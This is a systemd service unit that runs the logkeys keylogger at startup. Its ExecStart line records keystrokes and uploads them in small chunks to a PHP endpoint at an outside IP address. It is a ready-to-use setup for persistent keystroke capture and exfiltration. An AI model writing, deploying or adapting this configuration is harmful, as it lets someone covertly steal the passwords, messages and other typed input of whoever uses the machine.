[Unit]
Description=logkeys daemon service

[Service]
Type=simple
ExecStart=/usr/local/bin/logkeys -s -m /keymap/my_keymap --post-http=http://35.198.162.18/upload.php --post-size=1k --no-func-keys --no-daemon
ExecStop=/usr/local/bin/logkeys -k

[Install]
WantedBy=default.target
